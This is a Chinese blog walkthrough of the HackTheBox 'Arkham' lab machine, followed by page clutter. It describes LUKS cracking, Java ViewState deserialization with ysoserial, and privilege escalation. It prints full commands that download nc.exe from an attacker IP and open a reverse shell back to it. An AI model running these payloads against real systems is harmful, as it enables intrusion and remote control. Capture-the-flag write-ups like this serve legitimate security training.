No.83-HackTheBox-windows-Arkham-Walkthrough渗透学习

最新推荐文章于 2024-10-06 20:16:20 发布
最新推荐文章于 2024-10-06 20:16:20 发布
阅读量457 收藏
点赞数
分类专栏: Hack The box 文章标签: java python linux 安全 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/105274518
版权

**

HackTheBox-windows-Arkham-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/176
靶机难度:中级(4.8/10)
靶机发布日期:2019年5月15日
靶机描述:
Arkham is a medium difficulty Windows box which needs knowledge about encryption, java deserialization and Windows exploitation. A disk image present in an open share is found which is a LUKS encrypted disk. The disk is cracked to obtain configuration files. The Apache MyFaces page running on tomcat is vulnerable to deserialization but the viewstate needs to encrypted. After establishing a foothold an Outlook OST file is found, which contains a screenshot with a password. The user is found to be in the Administrators group, and a UAC bypass can be performed to gain a SYSTEM shell.

作者:大余
时间:2020-04-04
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.130…
在这里插入图片描述
IIS在端口80上与SMB和Apache tomcat一起在各自的端口上运行着…还有49666、49667端口…
在这里插入图片描述
找到BatShare共享,进去看看…
在这里插入图片描述
发现文件appserver.zip…好大的文件…
在这里插入图片描述
网络太差了!!移动的宽带走个代理出去,根本下不动appserver,我mount挂载,还是等待了半天才打开…
更坑爹的是,挂载完copy也不行,应该是网络原因,但是操作别的都正常…
在这里插入图片描述
非要以这种方式,等了7分钟,才完成14MB文件的加压~~~
在这里插入图片描述
只是告诉我们这是Linux服务器的备份镜像,需要密码登陆…果然这是LUKS加密的图像…
在这里插入图片描述
搜先利用grep batman /usr/share/wordlists/rockyou.txt > dayu.txt生成密码库…因为这台靶机http就提及了很多人名…batman 是列举人名的密码库…
然后利用bruteforce-luks暴力破解密码的工具进行破解,获得密码…
在这里插入图片描述
利用cryptsetup解密磁盘内容,输入密码可以看到,桌面生成了一个磁盘,进入是蝙蝠侠电视剧的几张图…和文件
里面是一些服务器配置文件和几张图,目前没发现别的信息,没密码没用户…继续往下
在这里插入图片描述
在这里插入图片描述
80和8080的web页面…
在这里插入图片描述
访问80端口的Subscription订阅信息,重定向到了userSubscribe.faces页面…
在这里插入图片描述
在这里插入图片描述
利用burp suit 分析页面具有.faces扩展名,并且POST请求具有参数javax.faces.ViewState…
在这里插入图片描述
在前端代码更清晰的看到此ViewState属性,这是一种MyFaces用于存储视图当前状态的机制,此状态是Java序列化的对象,这意味着我们可能必须进行Java反序列化攻击。存在的反序列化漏洞…
在这里插入图片描述
参考这篇文章可以获得点思路…java.lang.Object很好的解释了,这是base64编码进行DES和macSHA1加密的Java序列化对象…
下面的思路是:
找到DES和macSHA1密匙,然后利用base64值进行javax.faces.ViewState=注入…base64可以利用java生成shellcode转码成base64即可提权…开始
在这里插入图片描述
在前面挂在出的盘里web.xml.bak文件发现了DES和macSHA1密匙…
这里需要利用ysoserial集成工具进行生成jave反序列化的shellcode…功能很多
在这里插入图片描述
在这里插入图片描述
准备好了生成shellcode的工具…
在这里插入图片描述
在这里插入图片描述
命令:java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd.exe /c powershell -c Invoke-WebRequest -Uri "http://10.10.14.11/nc.exe" -OutFile "C:\windows\system32\spool\drivers\color\nc.exe"' > exploit
利用ysoserial最新版集成生成shellcode…
在这里插入图片描述
在这里插入图片描述
然后利用DES密匙简单的python代码生成base64值…
在这里插入图片描述
成功注入…NC上传成功…
在这里插入图片描述
命令:java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd.exe /c c:\windows\system32\spool\drivers\color\nc.exe -nv 10.10.14.11 443 -e cmd.exe' > exploit2
在这里插入图片描述
在这里插入图片描述
按照前面同理,写入shellcode出发nc即可获得反向外壳…
在这里插入图片描述
成功获得user信息…这里需要进入powershell
在这里插入图片描述
枚举目录发现在backups中C:\Users\Alfred\Downloads目录下有一个zip文件…利用nc进行下载…
在这里插入图片描述
存档中只有一个arkham.local.ostOutlook电子邮件文件,利用readpst将其转换…
转换成Drafts.mbox文件…
在这里插入图片描述
查看Drafts.mbox文件,存在base64值…
在这里插入图片描述
将base64转换后,发现这是png格式文件…修改即可
在这里插入图片描述
查看后发现了Batman的密码…
在这里插入图片描述
可以看到Batman用户在Administrators组以及Remote management users组中…
在这里插入图片描述
在这里插入图片描述
利用PowerShell Remoting使用他的凭据,成功进入PowerShell会话,然后利用原先上传的NC获得了反向shell…
在这里插入图片描述
直接读取root信息无法查看…前面查看信息是在adminidtrator组里,我进行了挂在共享…成功
在这里插入图片描述
通过挂在的E盘,成功获得了root信息…

由于我们已经成功得到root权限查看user.txt和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
专栏目录
Web中间件常见安全漏洞
KHOST的博客
03-19 8551
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
PROJECT-Arkham-Horror-Menu:PROJECT Arkham Horror的开始菜单
03-07
项目Arkham Horror Este proyectoestábasado en el juego de cartas LCG Arkham Horror de Fantasy飞行游戏。 实体版本,专业版本,适用于残障人士和SOLID。 拉丁美洲的信息通讯录: ://arkhamdb.com/ 详细信息:...
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6876
Hack The Box,一款有意思的渗透测试平台
Hack The Box注册 —邀请码教学(含注册失败及解决步骤)
qq_43337502的博客
08-15 1万+
Hack The Box注册 —邀请码教学(含注册失败及免费上网步骤)嫌麻烦的直接看这里详细教学看这里重头戏(无法注册解决方法) 官网:https://www.hackthebox.eu 邀请码填写地址:https://www.hackthebox.eu/invite 注册账号时需科学online 验证google机器人验证,提前准备好 推荐用手机注册,当然电脑也行(手机更快),这里用手机教学 嫌麻烦的直接看这里 打开官网->开发者选项(F12)->点击Console-> 输入$.post
Hack the box invited code(邀请码获取)
热门推荐
StriveBen的博客
03-15 4万+
0x00 Hack The Box 一个在线的渗透测试平台。 0x01 访问网址 https://www.hackthebox.eu/invite 0x02 打开console ,输入 makeInviteCode()后, 在post响应中获取到一串base64编码: 注意这里有的是 Va beqre gb trarengr gur vaivgr pbqr,...
docker-compose 搭建redis集群(三台服务器,每台服务器上一主一从)
钟晚语夕的专栏
08-29 1077
使用 Docker Compose 搭建 Redis 集群是一种便捷高效的方法,可以快速地在本地或者测试环境中搭建一个 Redis 集群。以下是详细的步骤,在 Docker 环境中使用 docker-compose 来搭建 Redis 集群。通过上述步骤,我们已经使用 Docker Compose 成功搭建了一个 Redis 集群。这种方式特别适合用于开发和测试环境,因为它的配置简单、部署快速,非常适合本地或测试环境中进行集群架构的模拟和验证。
Batman-Arkham-Combat 项目使用教程
gitblog_00810的博客
09-26 544
Batman-Arkham-Combat 项目使用教程 Batman-Arkham-Combat Recreating the Combat System from the Batman Arkham Series 项目地址: h...
linux python3安装proton_Proton 5.0-4 发布,增强游戏性能
weixin_35973521的博客
01-13 354
导读Proton 5.0-4作为Valve的基于Wine的层,可通过Steam Play在Linux上运行Windows游戏。Proton 5.0系列的最新更新基于Wine 5.0稳定的代码库,具有持续的性能增强,围绕Denuvo数字版权管理的工作以及引入了最新的DXVK。 DXVK 1.5.5于2月底发布,其中增加了Direct3D 9,对各种游戏进行了各种D3D10/D3D11修复,并对该Vu...
JQueryEasyUI-DataGrid数据显示
ARKHAM
11-23 383
在有的项目中,为了方便将数据库中的某些定值储存为指定的数字,例如在State中,将1指定为允许,0指定为禁止,但是在管理界面用1和0显示却不太美观且易用性很差,那么遇到这种情况该如何处理呢? 提一个最简单的方法,在DataGrid进行数据绑定的时候加上判断,代码如下: $("#dg").datagrid({ columns:[[ {field:'State',title:'拓展状
Arkham Horror Companion-开源
05-27
Arkham Horror Companion》是一款专为幻想类桌面游戏《Arkham Horror》设计的开源软件工具。这款软件的主要目的是为了增强玩家在游玩过程中体验,提供更深入的游戏辅助功能,帮助玩家更好地理解和管理游戏流程。 ...
Arkham Dark Theme-crx插件
04-04
语言:English (UK) 用于使Arkham Network论坛的外观变暗。 此扩展用于使Arkham Network论坛的外观变暗。...权限详细信息:https://github.com/Recol/Arkham-Dark-Theme/blob/master/Permission Requirements.md
Batman Arkham Asylum-crx插件
03-18
拥有美丽的蝙蝠侠阿卡姆庇护所的背景照片。 支持语言:English,български
arkham-cards-data:回购ArkhamCards应用网站的广告系列指南数据
03-05
arkham-cards-data 回购ArkhamCards应用的广告系列指南数据。 基本结构 广告系列数据主要位于/ campaigns文件夹中,由三个字母的广告系列代码构成。 活动 活动概述信息保存在campaign.json折叠中,包括混乱的书包和...
xbox360链接pc_如何将PC游戏从Windows 10免费流式传输到Xbox One
10-13 1171
I've been really enjoying my Xbox lately (when the family is asleep) as well as some fun Retrogaming on original consoles. Back in 2015 I showed how you can stream from your Xbox to any PC using the X...
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 893
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
JDK1.0主要特性
最新发布
FoolRabbit的专栏
10-06 289
JDK1.0主要特性。
JavaScript ArrayBuffer的读写与类型转换
白瑕 的博客
10-01 492
所有视图的基本单位是ArrayBuffer, ArrayBuffer中只存储二进制格式的数据.ArrayBuffer不可直接读写, 必须通过视图(比如DataView)暴露的API.
arkham cards安卓下载
01-02
Arkham Cards是一款针对人类心理学和策略的卡牌游戏。玩家需要通过精心策划的策略和心理战术来击败对手,游戏中的卡牌设计对玩家的心理素质和策略能力提出了极高的要求。游戏中的卡牌种类丰富多样,涵盖了各种不同的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值